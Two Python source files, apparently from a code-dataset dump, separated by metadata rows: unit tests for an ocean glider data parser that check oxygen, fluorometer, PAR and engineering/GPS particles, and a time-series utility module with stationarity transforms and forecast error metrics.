self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {DostaRecoveredParticleKey.SCI_OXY4_OXYGEN: 242.217,
DostaRecoveredParticleKey.SCI_OXY4_SATURATION: 96.009}
record_2 = {DostaRecoveredParticleKey.SCI_OXY4_OXYGEN: 242.141,
DostaRecoveredParticleKey.SCI_OXY4_SATURATION: 95.988}
self.assert_generate_particle(DostaRecoveredDataParticle, record_1)
self.assert_generate_particle(DostaRecoveredDataParticle, record_2)
self.assert_no_more_data()
@attr('UNIT', group='mi')
class FLORTTelemeteredGliderTest(GliderParserUnitTestCase):
"""
Test cases for flort glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'FlortTelemeteredDataParticle'
}
def test_flort_telemetered_particle(self):
"""
Verify we publish particles as expected. Ensure particle is published and
that state is returned.
"""
self.set_data(HEADER3, FLORT_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {FlortTelemeteredParticleKey.SCI_FLBBCD_BB_UNITS: 0.000281336,
FlortTelemeteredParticleKey.SCI_FLBBCD_CDOM_UNITS: 2.0352,
FlortTelemeteredParticleKey.SCI_FLBBCD_CHLOR_UNITS: 0.8349}
record_2 = {FlortTelemeteredParticleKey.SCI_FLBBCD_BB_UNITS: 0.000262988,
FlortTelemeteredParticleKey.SCI_FLBBCD_CDOM_UNITS: 2.12,
FlortTelemeteredParticleKey.SCI_FLBBCD_CHLOR_UNITS: 0.847}
self.assert_generate_particle(FlortTelemeteredDataParticle, record_1)
self.assert_generate_particle(FlortTelemeteredDataParticle, record_2)
self.assert_no_more_data()
def test_multiple_yml(self):
"""
Test with a yml file with multiple records
"""
with open(os.path.join(FLORT_M_RESOURCE_PATH, 'multiple_glider_record.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
record = parser.get_records(4)
self.assert_particles(record, 'multiple_flort_record.mrg.result.yml', FLORT_M_RESOURCE_PATH)
self.assertEquals(self.exception_callback_value, [])
@attr('UNIT', group='mi')
class FLORTRecoveredGliderTest(GliderParserUnitTestCase):
"""
Test cases for recovered flort glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'FlortRecoveredDataParticle'
}
def test_flort_recovered_particle(self):
"""
Verify we publish particles as expected. Ensure particle is published and
that state is returned.
"""
self.set_data(HEADER3, FLORT_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {FlortRecoveredParticleKey.SCI_FLBBCD_BB_UNITS: 0.000281336,
FlortRecoveredParticleKey.SCI_FLBBCD_CDOM_UNITS: 2.0352,
FlortRecoveredParticleKey.SCI_FLBBCD_CHLOR_UNITS: 0.8349}
record_2 = {FlortRecoveredParticleKey.SCI_FLBBCD_BB_UNITS: 0.000262988,
FlortRecoveredParticleKey.SCI_FLBBCD_CDOM_UNITS: 2.12,
FlortRecoveredParticleKey.SCI_FLBBCD_CHLOR_UNITS: 0.847}
self.assert_generate_particle(FlortRecoveredDataParticle, record_1)
self.assert_generate_particle(FlortRecoveredDataParticle, record_2)
self.assert_no_more_data()
@attr('UNIT', group='mi')
class FlortOTelemeteredGliderTest(GliderParserUnitTestCase):
"""
Test cases for FLORT-O glider data.
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'FlortODataParticle'
}
def test_flort_o_telemetered_particle(self):
"""
Verify we publish particles as expected. Ensure particle is published and
that state is returned.
"""
self.set_data(HEADER6, FLORT_O_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {FlortODataParticleKey.SCI_BB3SLO_B470_SIG: 70,
FlortODataParticleKey.SCI_BB3SLO_B532_SIG: 101,
FlortODataParticleKey.SCI_BB3SLO_B660_SIG: 169}
record_2 = {FlortODataParticleKey.SCI_BB3SLO_B470_SIG: 148,
FlortODataParticleKey.SCI_BB3SLO_B532_SIG: 217,
FlortODataParticleKey.SCI_BB3SLO_B660_SIG: 4047}
self.assert_generate_particle(FlortODataParticle, record_1)
self.assert_generate_particle(FlortODataParticle, record_2)
self.assert_no_more_data()
def test_merged_data(self):
"""
Test with a FLORT-O merged telemetered data file.
"""
with open(os.path.join(FLORT_O_RESOURCE_PATH, 'merged_flort_o_telemetered_data.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
record = parser.get_records(5)
self.assert_particles(record, 'merged_flort_o_telemetered_data.mrg.result.yml', FLORT_O_RESOURCE_PATH)
self.assertEquals(self.exception_callback_value, [])
@attr('UNIT', group='mi')
class FlortORecoveredGliderTest(GliderParserUnitTestCase):
"""
Test cases for recovered FLORT-O glider data.
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'FlortODataParticle'
}
def test_flort_o_recovered_particle(self):
"""
Verify we publish particles as expected. Ensure particle is published and
that state is returned.
"""
self.set_data(HEADER6, FLORT_O_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {FlortODataParticleKey.SCI_BB3SLO_B470_SIG: 70,
FlortODataParticleKey.SCI_BB3SLO_B532_SIG: 101,
FlortODataParticleKey.SCI_BB3SLO_B660_SIG: 169}
record_2 = {FlortODataParticleKey.SCI_BB3SLO_B470_SIG: 148,
FlortODataParticleKey.SCI_BB3SLO_B532_SIG: 217,
FlortODataParticleKey.SCI_BB3SLO_B660_SIG: 4047}
self.assert_generate_particle(FlortODataParticle, record_1)
self.assert_generate_particle(FlortODataParticle, record_2)
self.assert_no_more_data()
def test_merged_data(self):
"""
Test with a FLORT-O merged recovered data file.
"""
with open(os.path.join(FLORT_O_RESOURCE_PATH, 'merged_flort_o_recovered_data.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
record = parser.get_records(5)
self.assert_particles(record, 'merged_flort_o_recovered_data.mrg.result.yml', FLORT_O_RESOURCE_PATH)
self.assertEquals(self.exception_callback_value, [])
@attr('UNIT', group='mi')
class PARADTelemeteredGliderTest(GliderParserUnitTestCase):
"""
Test cases for parad glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'ParadTelemeteredDataParticle'
}
def test_parad_telemetered_particle(self):
"""
Verify we publish particles as expected. Ensure particle is published and
that state is returned.
"""
# reused the FLORT record data for this Parad test
self.set_data(HEADER3, FLORT_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {ParadTelemeteredParticleKey.SCI_BSIPAR_PAR: 664.424}
record_2 = {ParadTelemeteredParticleKey.SCI_BSIPAR_PAR: 645.569}
# (10553 = file size up to start of last row) 10553 - 19 bytes (for 19 lines of Carriage returns above) = 10534
self.assert_generate_particle(ParadTelemeteredDataParticle, record_1)
# (11997 = file size in bytes) 11997 - 20 bytes (for 20 lines of Carriage returns above) = 11977
self.assert_generate_particle(ParadTelemeteredDataParticle, record_2)
self.assert_no_more_data()
def test_multiple_yml(self):
"""
Test with a yml file with multiple records
"""
with open(os.path.join(PARAD_RESOURCE_PATH, 'multiple_glider_record.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
record = parser.get_records(4)
self.assert_particles(record, 'multiple_parad_record.mrg.result.yml', PARAD_RESOURCE_PATH)
self.assertEquals(self.exception_callback_value, [])
@attr('UNIT', group='mi')
class PARADRecoveredGliderTest(GliderParserUnitTestCase):
"""
Test cases for recovered parad glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'ParadRecoveredDataParticle'
}
def test_parad_recovered_particle(self):
"""
Verify we publish particles as expected. Ensure particle is published and
that state is returned.
"""
# reused the FLORT record data for this Parad test
self.set_data(HEADER3, FLORT_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {ParadRecoveredParticleKey.SCI_BSIPAR_PAR: 664.424}
record_2 = {ParadRecoveredParticleKey.SCI_BSIPAR_PAR: 645.569}
# (10553 = file size up to start of last row) 10553 - 19 bytes (for 19 lines of Carriage returns above) = 10534
self.assert_generate_particle(ParadRecoveredDataParticle, record_1)
# (11997 = file size in bytes) 11997 - 20 bytes (for 20 lines of Carriage returns above) = 11977
self.assert_generate_particle(ParadRecoveredDataParticle, record_2)
self.assert_no_more_data()
@attr('UNIT', group='mi')
class FLORDTelemeteredGliderTest(GliderParserUnitTestCase):
"""
Test cases for flord glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'FlordTelemeteredDataParticle'
}
def test_flord_telemetered_particle(self):
"""
Verify we publish particles as expected. Ensure particle is published and
that state is returned.
"""
# reused the FLORT record data for this Flord test
self.set_data(HEADER5, FLORD_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {FlordParticleKey.SCI_FLBB_BB_UNITS: 0.000281, FlordParticleKey.SCI_FLBB_CHLOR_UNITS: 0.8349}
record_2 = {FlordParticleKey.SCI_FLBB_BB_UNITS: 0.000263, FlordParticleKey.SCI_FLBB_CHLOR_UNITS: 0.847}
self.assert_generate_particle(FlordTelemeteredDataParticle, record_1)
self.assert_generate_particle(FlordTelemeteredDataParticle, record_2)
self.assert_no_more_data()
def test_multiple_yml(self):
"""
Test with a yml file with a single record
"""
with open(os.path.join(FLORD_M_RESOURCE_PATH, 'multiple_flord_record.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
record = parser.get_records(4)
self.assert_particles(record, 'multiple_flord_record.mrg.result.yml', FLORD_M_RESOURCE_PATH)
self.assertEquals(self.exception_callback_value, [])
def test_real(self):
"""
Test with a real file and confirm no exceptions occur
"""
with open(os.path.join(FLORD_M_RESOURCE_PATH, 'unit_363_2013_245_6_6.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
records = parser.get_records(240)
self.assert_(len(records) > 0)
self.assertEquals(self.exception_callback_value, [])
@attr('UNIT', group='mi')
class FLORDRecoveredGliderTest(GliderParserUnitTestCase):
"""
Test cases for flord glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'FlordRecoveredDataParticle'
}
def test_flord_recovered_particle(self):
"""
Verify we publish particles as expected. Ensure particle is published and
that state is returned.
"""
# reused the FLORT record data for this Flord test
self.set_data(HEADER5, FLORD_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {FlordParticleKey.SCI_FLBB_BB_UNITS: 0.000281, FlordParticleKey.SCI_FLBB_CHLOR_UNITS: 0.8349}
record_2 = {FlordParticleKey.SCI_FLBB_BB_UNITS: 0.000263, FlordParticleKey.SCI_FLBB_CHLOR_UNITS: 0.847}
self.assert_generate_particle(FlordRecoveredDataParticle, record_1)
self.assert_generate_particle(FlordRecoveredDataParticle, record_2)
self.assert_no_more_data()
@attr('UNIT', group='mi')
class ENGGliderTest(GliderParserUnitTestCase):
"""
Test cases for eng glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {
EngineeringClassKey.METADATA: 'EngineeringMetadataDataParticle',
EngineeringClassKey.DATA: 'EngineeringTelemeteredDataParticle',
EngineeringClassKey.SCIENCE: 'EngineeringScienceTelemeteredDataParticle',
EngineeringClassKey.GPS: 'GpsPositionDataParticle'
}
}
def test_eng_particle(self):
"""
Verify we publish particles as expected. Ensure particle is published and
that state is returned.
"""
self.set_data(HEADER4, ENGSCI_RECORD)
self.parser = GliderEngineeringParser(self.config, self.test_data, self.exception_callback)
meta_record = {EngineeringMetadataParticleKey.GLIDER_ENG_FILENAME: 'unit_247-2012-051-0-0-dbd(01840000)',
EngineeringMetadataParticleKey.GLIDER_MISSION_NAME: 'ENDUR1.MI',
EngineeringMetadataParticleKey.GLIDER_ENG_FILEOPEN_TIME: 'Tue_Feb_21_18:39:39_2012'}
record_1 = {EngineeringTelemeteredParticleKey.M_BATTPOS: 0.703717,
EngineeringTelemeteredParticleKey.M_HEADING: 5.05447}
record_2 = {EngineeringTelemeteredParticleKey.M_BATTPOS: 0.695632,
EngineeringTelemeteredParticleKey.M_HEADING: 5.05447}
record_sci_1 = {EngineeringScienceTelemeteredParticleKey.SCI_M_DISK_FREE: 1000.1,
EngineeringScienceTelemeteredParticleKey.SCI_M_DISK_USAGE: 1000.1}
record_sci_2 = {EngineeringScienceTelemeteredParticleKey.SCI_M_DISK_FREE: 1000.2,
EngineeringScienceTelemeteredParticleKey.SCI_M_DISK_USAGE: 1000.2}
record_gps_1 = {GpsPositionParticleKey.M_GPS_LAT: 43.47113833333333,
GpsPositionParticleKey.M_GPS_LON: -125.39660833333333}
record_gps_2 = {GpsPositionParticleKey.M_GPS_LAT: 43.47113833333333,
GpsPositionParticleKey.M_GPS_LON: -125.39660833333333}
self.assert_generate_particle(EngineeringMetadataDataParticle, meta_record)
# 1 sample line generates 3 particles
self.assert_generate_particle(EngineeringTelemeteredDataParticle, record_1)
self.assert_generate_particle(GpsPositionDataParticle, record_gps_1)
self.assert_generate_particle(EngineeringScienceTelemeteredDataParticle, record_sci_1)
self.assert_generate_particle(EngineeringTelemeteredDataParticle, record_2)
self.assert_generate_particle(GpsPositionDataParticle, record_gps_2)
self.assert_generate_particle(EngineeringScienceTelemeteredDataParticle, record_sci_2)
self.assert_no_more_data()
def test_encode_lat(self):
"""
Test that encoding a latitude value that doesn't match the regex produces an encoding exception
"""
self.set_data(HEADER4, ENGSCI_BAD_LAT_RECORD)
self.parser = GliderEngineeringParser(self.config, self.test_data, self.exception_callback)
record_1 = {EngineeringTelemeteredParticleKey.M_BATTPOS: 0.703717,
EngineeringTelemeteredParticleKey.M_HEADING: 5.05447,
EngineeringTelemeteredParticleKey.C_WPT_LAT: None,
EngineeringTelemeteredParticleKey.C_WPT_LON: -126.0}
record_2 = {EngineeringTelemeteredParticleKey.M_BATTPOS: 0.695632,
EngineeringTelemeteredParticleKey.M_HEADING: 5.05447,
EngineeringTelemeteredParticleKey.C_WPT_LAT: 0.5,
EngineeringTelemeteredParticleKey.C_WPT_LON: -126.0}
# just check the data records, the other particle classes were checked above
self.assert_generate_particle(EngineeringMetadataDataParticle)
self.assert_generate_particle(EngineeringTelemeteredDataParticle, record_1)
self.assert_generate_particle(GpsPositionDataParticle)
self.assert_generate_particle(EngineeringScienceTelemeteredDataParticle)
self.assert_generate_particle(EngineeringTelemeteredDataParticle, record_2)
self.assert_generate_particle(GpsPositionDataParticle)
self.assert_generate_particle(EngineeringScienceTelemeteredDataParticle)
self.assert_no_more_data()
def test_bad_config(self):
"""
Test that a bad config causes as exception
"""
# bad metadata class, this one does not exist
bad_config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {
EngineeringClassKey.METADATA: 'EngineeringDataParticle',
EngineeringClassKey.DATA: 'EngineeringTelemeteredDataParticle',
EngineeringClassKey.SCIENCE: 'EngineeringScienceTelemeteredDataParticle'
}
}
self.set_data(HEADER4, ENGSCI_RECORD)
with self.assertRaises(ConfigurationException):
self.parser = GliderEngineeringParser(bad_config, self.test_data, self.exception_callback)
# no config
with self.assertRaises(ConfigurationException):
self.parser = GliderEngineeringParser({}, self.test_data, self.exception_callback)
# no particle classes dict in config
bad_config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
}
with self.assertRaises(ConfigurationException):
self.parser = GliderEngineeringParser(bad_config, self.test_data, self.exception_callback)
@attr('UNIT', group='mi')
class ENGRecoveredGliderTest(GliderParserUnitTestCase):
"""
Test cases for recovered eng glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {
EngineeringClassKey.METADATA: 'EngineeringMetadataRecoveredDataParticle',
EngineeringClassKey.DATA: 'EngineeringRecoveredDataParticle',
EngineeringClassKey.SCIENCE: 'EngineeringScienceRecoveredDataParticle',
EngineeringClassKey.GPS: 'GpsPositionDataParticle'
}
}
def test_eng_recovered_particle(self):
"""
Verify we publish particles as expected. Ensure particle is published and
that state is returned.
"""
self.set_data(HEADER4, ENGSCI_RECORD)
self.parser = GliderEngineeringParser(self.config, self.test_data, self.exception_callback)
meta_record = {EngineeringMetadataParticleKey.GLIDER_ENG_FILENAME: 'unit_247-2012-051-0-0-dbd(01840000)',
EngineeringMetadataParticleKey.GLIDER_MISSION_NAME: 'ENDUR1.MI',
EngineeringMetadataParticleKey.GLIDER_ENG_FILEOPEN_TIME: 'Tue_Feb_21_18:39:39_2012'}
record_1 = {EngineeringRecoveredParticleKey.M_BATTPOS: 0.703717,
EngineeringRecoveredParticleKey.M_HEADING: 5.05447}
record_2 = {EngineeringRecoveredParticleKey.M_BATTPOS: 0.695632,
EngineeringRecoveredParticleKey.M_HEADING: 5.05447}
record_sci_1 = {EngineeringScienceRecoveredParticleKey.SCI_M_DISK_FREE: 1000.1,
EngineeringScienceRecoveredParticleKey.SCI_M_DISK_USAGE: 1000.1}
record_sci_2 = {EngineeringScienceRecoveredParticleKey.SCI_M_DISK_FREE: 1000.2,
EngineeringScienceRecoveredParticleKey.SCI_M_DISK_USAGE: 1000.2}
record_gps_1 = {GpsPositionParticleKey.M_GPS_LAT: 43.47113833333333,
GpsPositionParticleKey.M_GPS_LON: -125.39660833333333}
record_gps_2 = {GpsPositionParticleKey.M_GPS_LAT: 43.47113833333333,
GpsPositionParticleKey.M_GPS_LON: -125.39660833333333}
self.assert_generate_particle(EngineeringMetadataRecoveredDataParticle, meta_record)
# 1 sample line generates 2 particles
self.assert_generate_particle(EngineeringRecoveredDataParticle, record_1)
self.assert_generate_particle(GpsPositionDataParticle, record_gps_1)
self.assert_generate_particle(EngineeringScienceRecoveredDataParticle, record_sci_1)
# total file size in bytes
self.assert_generate_particle(EngineeringRecoveredDataParticle, record_2)
self.assert_generate_particle(GpsPositionDataParticle, record_gps_2)
self.assert_generate_particle(EngineeringScienceRecoveredDataParticle, record_sci_2)
self.assert_no_more_data()
def test_multiple_yml(self):
"""
Test with a yml file with a multiple records
"""
with open(os.path.join(ENG_RESOURCE_PATH, 'multiple_glider_record-engDataOnly.mrg'), 'rU') as file_handle:
parser = GliderEngineeringParser(self.config, file_handle, self.exception_callback)
particles = parser.get_records(13)
self.assert_particles(particles, 'multiple_glider_record_recovered-engDataOnly.mrg.result.yml',
ENG_RESOURCE_PATH)
self.assertEquals(self.exception_callback_value, [])
def test_real(self):
"""
Test a real file and confirm no exceptions occur
"""
with open(os.path.join(ENG_RESOURCE_PATH, 'unit_363_2013_245_6_6.mrg'), 'rU') as file_handle:
parser = GliderEngineeringParser(self.config, file_handle, self.exception_callback)
records = parser.get_records(240)
self.assert_(len(records) > 3)
self.assertEquals(self.exception_callback_value, [])
def test_ingest_errors(self):
"""
Test to check handling of inf fill values in real file
"""
with open(os.path.join(ENG_RESOURCE_PATH, 'cp_388_2014_280_0_245.full.mrg'), 'rU') as file_handle:
parser = GliderEngineeringParser(self.config, file_handle, self.exception_callback)
particles = parser.get_records(32000)
for particle in particles:
data_dict = particle.generate_dict()
# self.assert_particles(particles, 'multiple_glider_record_recovered-engDataOnly.mrg.result.yml',
# ENG_RESOURCE_PATH)
self.assertEquals(self.exception_callback_value, [])
def test_for_69_file(self):
"""
Test a real file and confirm no exceptions occur with file containing 69696969 fill values
"""
with open(os.path.join(ENG_RESOURCE_PATH, 'cp_388_2016_012_0_0.mrg'), 'rU') as file_handle:
parser = GliderEngineeringParser(self.config, file_handle, self.exception_callback)
records = parser.get_records(2000)
self.assert_(len(records) > 3)
self.assertEquals(self.exception_callback_value, [])
def test_69_values(self):
"""
Test that encoding a value of 69696969 results in param values of None
"""
record_gps_1 = {GpsPositionParticleKey.M_GPS_LAT: None,
GpsPositionParticleKey.M_GPS_LON: None}
record_gps_2 = {GpsPositionParticleKey.M_GPS_LAT: None,
GpsPositionParticleKey.M_GPS_LON: None}
self.set_data(HEADER4, ENGSCI_RECORD_69)
self.parser = GliderEngineeringParser(self.config, self.test_data, self.exception_callback)
# just check the data records, the other particle classes were checked above
self.assert_generate_particle(EngineeringMetadataRecoveredDataParticle)
self.assert_generate_particle(EngineeringRecoveredDataParticle)
self.assert_generate_particle(GpsPositionDataParticle, record_gps_1)
self.assert_generate_particle(EngineeringScienceRecoveredDataParticle)
self.assert_generate_particle(EngineeringRecoveredDataParticle)
self.assert_generate_particle(GpsPositionDataParticle, record_gps_2)
self.assert_generate_particle(EngineeringScienceRecoveredDataParticle)
self.assert_no_more_data()
def test_for_nan_NaN(self):
"""
Test a real file and confirm no exceptions occur when nan is used instead of NaN
"""
with open(os.path.join(ENG_RESOURCE_PATH, 'cp_388_2016_012_1_0.mrg'), 'rU') as file_handle:
parser = GliderEngineeringParser(self.config, file_handle, self.exception_callback)
records = parser.get_records(2000)
self.assert_(len(records) > 3)
self.assertEquals(self.exception_callback_value, [])
| 87.48766
| 6,480
| 0.768248
|
a3dc9f62bbc97d1482035de5b44417efbe36d86a
| 7,746
|
py
|
Python
|
src/utils/ts_utils.py
|
PacktPublishing/Modern-Time-Series-Forecasting-with-Python-
|
391ae9c8c8c5b2fba20a8ada8e48e68eb46f118a
|
[
"MIT"
] | 10
|
2021-08-09T11:06:28.000Z
|
2022-03-07T14:47:36.000Z
|
src/utils/ts_utils.py
|
PacktPublishing/Modern-Time-Series-Forecasting-with-Python-
|
391ae9c8c8c5b2fba20a8ada8e48e68eb46f118a
|
[
"MIT"
] | null | null | null |
src/utils/ts_utils.py
|
PacktPublishing/Modern-Time-Series-Forecasting-with-Python-
|
391ae9c8c8c5b2fba20a8ada8e48e68eb46f118a
|
[
"MIT"
] | null | null | null |
import numpy as np
from functools import partial
from src.decomposition.seasonal import _detrend
def make_stationary(x: np.ndarray, method: str="detrend", detrend_kwargs:dict={}):
"""Utility to make time series stationary
Args:
x (np.ndarray): The time series array to be made stationary
method (str, optional): {"detrend","logdiff"}. Defaults to "detrend".
detrend_kwargs (dict, optional): These kwargs will be passed on to the detrend method
"""
if method=="detrend":
detrend_kwargs["return_trend"] = True
stationary, trend = _detrend(x, **detrend_kwargs)
def inverse_transform(st, trend):
return st+trend
return stationary, partial(inverse_transform, trend=trend)
elif method == "logdiff":
stationary = np.log(x[:-1]/x[1:])
def inverse_transform(st, x):
_x = np.exp(st)
return _x*x[1:]
return stationary, partial(inverse_transform, x=x)
from darts import TimeSeries
from darts.metrics.metrics import _get_values_or_raise, _remove_nan_union
from darts.metrics import metrics as dart_metrics
from typing import Optional, Union, Sequence, Callable
from src.utils.data_utils import is_datetime_dtypes
import pandas as pd
def forecast_bias(actual_series: Union[TimeSeries, Sequence[TimeSeries], np.ndarray],
pred_series: Union[TimeSeries, Sequence[TimeSeries], np.ndarray],
intersect: bool = True,
*,
reduction: Callable[[np.ndarray], float] = np.mean,
inter_reduction: Callable[[np.ndarray], Union[float, np.ndarray]] = lambda x: x,
n_jobs: int = 1,
verbose: bool = False) -> Union[float, np.ndarray]:
""" Forecast Bias (FB).
Given a time series of actual values :math:`y_t` and a time series of predicted values :math:`\\hat{y}_t`
both of length :math:`T`, it is a percentage value computed as
.. math:: 100 \\cdot \\frac{\\sum_{t=1}^{T}{y_t}
- \\sum_{t=1}^{T}{\\hat{y}_t}}{\\sum_{t=1}^{T}{y_t}}.
If any of the series is stochastic (containing several samples), the median sample value is considered.
Parameters
----------
actual_series
The `TimeSeries` or `Sequence[TimeSeries]` of actual values.
pred_series
The `TimeSeries` or `Sequence[TimeSeries]` of predicted values.
intersect
For time series that are overlapping in time without having the same time index, setting `intersect=True`
will consider the values only over their common time interval (intersection in time).
reduction
Function taking as input a `np.ndarray` and returning a scalar value. This function is used to aggregate
the metrics of different components in case of multivariate `TimeSeries` instances.
inter_reduction
Function taking as input a `np.ndarray` and returning either a scalar value or a `np.ndarray`.
This function can be used to aggregate the metrics of different series in case the metric is evaluated on a
`Sequence[TimeSeries]`. Defaults to the identity function, which returns the pairwise metrics for each pair
of `TimeSeries` received in input. Example: `inter_reduction=np.mean`, will return the average of the pairwise
metrics.
n_jobs
The number of jobs to run in parallel. Parallel jobs are created only when a `Sequence[TimeSeries]` is
passed as input, parallelising operations regarding different `TimeSeries`. Defaults to `1`
(sequential). Setting the parameter to `-1` means using all the available processors.
verbose
Optionally, whether to print operations progress
Raises
------
ValueError
If :math:`\\sum_{t=1}^{T}{y_t} = 0`.
Returns
-------
float
The Forecast Bias (OPE)
"""
assert type(actual_series) is type(pred_series), "actual_series and pred_series should be of same type."
if isinstance(actual_series, np.ndarray):
y_true, y_pred = actual_series, pred_series
else:
y_true, y_pred = _get_values_or_raise(actual_series, pred_series, intersect)
y_true, y_pred = _remove_nan_union(y_true, y_pred)
y_true_sum, y_pred_sum = np.sum(y_true), np.sum(y_pred)
# raise_if_not(y_true_sum > 0, 'The series of actual value cannot sum to zero when computing OPE.', logger)
return ((y_true_sum - y_pred_sum) / y_true_sum) * 100.
def darts_metrics_adapter(metric_func, actual_series: Union[TimeSeries, Sequence[TimeSeries]],
pred_series: Union[TimeSeries, Sequence[TimeSeries]],
insample: Union[TimeSeries, Sequence[TimeSeries]] = None,
m: Optional[int] = 1,
intersect: bool = True,
reduction: Callable[[np.ndarray], float] = np.mean,
inter_reduction: Callable[[np.ndarray], Union[float, np.ndarray]] = lambda x: x,
n_jobs: int = 1,
verbose: bool = False):
is_pd_dataframe = isinstance(actual_series, pd.DataFrame)
if is_pd_dataframe:
if actual_series.shape[1]==1:
actual_series = actual_series.squeeze()
pred_series = pred_series.squeeze()
if insample is not None:
insample = insample.squeeze()
is_pd_series = True
else:
raise ValueError("Dataframes with more than one columns are not supported in the adapter. Use either Series with datetime index, dataframe with a single column and datetime index, or numpy arrays")
assert type(actual_series) is type(pred_series), f"actual_series({type(actual_series)}) and pred_series({type(pred_series)}) should be of same type."
if insample is not None:
assert type(actual_series) is type(insample), "actual_series and insample should be of same type."
is_nd_array = isinstance(actual_series, np.ndarray)
is_pd_series = isinstance(actual_series, pd.Series)
if is_pd_series:
is_datetime_index = is_datetime_dtypes(actual_series.index) and is_datetime_dtypes(pred_series.index)
if insample is not None:
is_datetime_index = is_datetime_index and is_datetime_dtypes(insample.index)
else:
is_datetime_index = False
if metric_func.__name__ == "mase":
if not is_datetime_index:
raise ValueError("MASE needs pandas Series with datetime index as inputs")
if is_nd_array or (is_pd_series and not is_datetime_index):
actual_series, pred_series = TimeSeries.from_values(actual_series.values if is_pd_series else actual_series), TimeSeries.from_values(pred_series.values if is_pd_series else pred_series)
if insample is not None:
insample = TimeSeries.from_values(insample.values if is_pd_series else insample)
elif is_pd_series and is_datetime_index:
actual_series, pred_series = TimeSeries.from_series(actual_series), TimeSeries.from_series(pred_series)
if insample is not None:
insample = TimeSeries.from_series(insample)
else:
raise ValueError()
if metric_func.__name__ == "mase":
return metric_func(actual_series=actual_series, pred_series=pred_series, insample=insample, m=m, intersect=intersect, reduction=reduction, inter_reduction=inter_reduction, n_jobs=n_jobs, verbose=verbose)
else:
return metric_func(actual_series=actual_series, pred_series=pred_series, intersect=intersect, reduction=reduction, inter_reduction=inter_reduction, n_jobs=n_jobs, verbose=verbose)
def mae(actuals, predictions):
return np.nanmean(np.abs(actuals-predictions))
def mse(actuals, predictions):
return np.nanmean(np.power(actuals-predictions, 2))
def forecast_bias_aggregate(actuals, predictions):
return (np.nansum(predictions)-np.nansum(actuals))/np.nansum(actuals)
| 49.974194
| 211
| 0.700878
|
3f15549f6cf9e0e54483db709e920bbf00009aa4
| 438
|
py
|
Python
|
brain_training/programming_challenges/leetcode/easy/T415_Add_Strings.py
|
kuzxnia/algoritms
|
eda3185f39d79a2657b7ef0da869fcc6b825889d
|
[
"MIT"
] | null | null | null |
brain_training/programming_challenges/leetcode/easy/T415_Add_Strings.py
|
kuzxnia/algoritms
|
eda3185f39d79a2657b7ef0da869fcc6b825889d
|
[
"MIT"
] | null | null | null |
brain_training/programming_challenges/leetcode/easy/T415_Add_Strings.py
|
kuzxnia/algoritms
|
eda3185f39d79a2657b7ef0da869fcc6b825889d
|
[
"MIT"
] | null | null | null |
class Solution:
def addStrings(self, num1, num2):
if len(num1) == 0:
return num2
if len(num2) == 0:
return num1
digit_sum = int(num1[-1]) + int(num2[-1])
if digit_sum > 9:
return self.addStrings(self.addStrings(num1[:-1], str(digit_sum // 10)), num2[:-1]) + str(digit_sum % 10)
else:
return self.addStrings(num1[:-1], num2[:-1]) + str(digit_sum)
| 36.5
| 117
| 0.531963
|
2a9dc97cf8f5358ac44d46150f0a9caf8501094e
| 115,605
|
py
|
Python
|
sdf/filter_info.py
|
drgmk/sdf
|
a44e66a82f876dda079686b32c767370276c38a1
|
[
"MIT"
] | 1
|
2020-07-01T15:55:16.000Z
|
2020-07-01T15:55:16.000Z
|
sdf/filter_info.py
|
drgmk/sdf
|
a44e66a82f876dda079686b32c767370276c38a1
|
[
"MIT"
] | 4
|
2017-03-28T19:18:09.000Z
|
2021-09-21T08:17:45.000Z
|
sdf/filter_info.py
|
drgmk/sdf
|
